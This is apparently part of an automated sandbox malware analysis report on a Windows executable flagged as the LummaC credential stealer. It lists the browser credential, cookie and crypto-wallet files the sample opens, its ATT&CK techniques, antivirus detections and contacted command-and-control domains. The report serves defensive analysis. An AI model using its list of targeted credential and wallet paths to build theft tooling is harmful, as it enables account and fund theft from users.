                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1539453644.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4KDKJjRzm8.exe PID: 1460, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 4KDKJjRzm8.exe PID: 1460, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		1
                OS Credential Dumping                		851
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory44
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol31
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS1
                File and Directory Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets223
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                4KDKJjRzm8.exe63%ReversingLabsWin32.Exploit.LummaC
                4KDKJjRzm8.exe100%AviraTR/Crypt.XPACK.Gen
                4KDKJjRzm8.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/pitT100%Avira URL Cloudmalware
                https://lev-tolstoi.com/api)100%Avira URL Cloudmalware
                https://lev-tolstoi.com/s100%Avira URL Cloudmalware
                https://lev-tolstoi.com/piD100%Avira URL Cloudmalware
                https://lev-tolstoi.com/pi0100%Avira URL Cloudmalware
                https://lev-tolstoi.com/pi4100%Avira URL Cloudmalware
                https://lev-tolstoi.com/iaj100%Avira URL Cloudmalware
                https://lev-tolstoi.com/qo100%Avira URL Cloudmalware
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.0%Avira URL Cloudsafe
                https://lev-tolstoi.com/ARE100%Avira URL Cloudmalware
                https://lev-tolstoi.com/stT100%Avira URL Cloudmalware
                https://avatars.fastly.steamstati0%Avira URL Cloudsafe
                https://lev-tolstoi.com/te100%Avira URL Cloudmalware
                https://lev-tolstoi.com//Passw100%Avira URL Cloudmalware
                https://lev-tolstoi.com/ients/100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apitly100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apin100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		172.67.157.254
                  		truefalse
                    		high
                    s-part-0035.t-0009.t-msedge.net
                    		13.107.246.63
                    		truefalse
                      		high
                      wordyfindy.lat
                      		unknown
                      		unknownfalse
                        		high
                        slipperyloo.lat
                        		unknown
                        		unknownfalse
                          		high
                          curverpluch.lat
                          		unknown
                          		unknownfalse
                            		high
                            tentabatte.lat
                            		unknown
                            		unknownfalse
                              		high
                              manyrestro.lat
                              		unknown
                              		unknownfalse
                                		high
                                bashfulacid.lat
                                		unknown
                                		unknownfalse
                                  		high
                                  shapestickyr.lat
                                  		unknown
                                  		unknownfalse
                                    		high
                                    observerfry.lat
                                    		unknown
                                    		unknownfalse
                                      		high
                                      talkynicer.lat
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        slipperyloo.latfalse
                                          		high
                                          observerfry.latfalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              https://lev-tolstoi.com/apifalse
                                                		high
                                                curverpluch.latfalse
                                                  		high
                                                  tentabatte.latfalse
                                                    		high
                                                    manyrestro.latfalse
                                                      		high
                                                      bashfulacid.latfalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/chrome_newtab4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://player.vimeo.com4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=englis4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcasts4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
